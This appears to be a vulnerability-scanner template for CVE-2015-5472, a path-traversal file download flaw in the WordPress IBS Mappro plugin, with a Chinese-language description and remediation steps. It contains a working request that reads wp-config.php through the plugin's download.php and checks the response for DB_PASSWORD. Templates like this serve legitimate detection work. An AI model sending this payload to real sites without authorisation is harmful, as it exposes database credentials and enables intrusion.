id: CVE-2015-5472
info:
  name: Wordpress ibs-mappro Plugin Arbitrary File Download Vulnerability
  author:
  - l0ne1y
  description: |+
    WordPress Plugin IBS Mappro 绝对路径遍历导致文件下载漏洞
    WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。IBS Mappro是其中的一个旅游地图编辑器和查看器插件。

    WordPress IBS Mappro插件1.0之前版本中的lib/download.php文件中存在绝对路径遍历漏洞。远程攻击者可借助‘file’参数中的完整路径名利用该漏洞读取任意文件。

  severity: high
  remediation: |-
    官方修复方案：
    1、建议用户到官方获取最新补丁或者最新版本程序：https://wordpress.org/plugins/ibs-mappro/changelog/

    临时修复方案：
    1、过滤\".\"，使用户在url中不能回溯上级目录。
    2、正则匹配严格判断用户输入参数的格式，对用户传过来的文件名参数进行硬编码或统一编码，对文件类型进行白名单控制，对包含恶意字符或者空字符的参数进行拒绝。
    3、禁止系统提供目录遍历服务，如：php.ini配置open_basedir限定文件访问范围。
    4、文件路径保存至数据库，让用户提交文件对应ID下载文件。
    5、用户下载文件之前进行权限校验。
requests:
- matchers:
  - type: dsl
    dsl:
    - contains(body,"DB_PASSWORD") && status_code==200
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php'
  method: GET
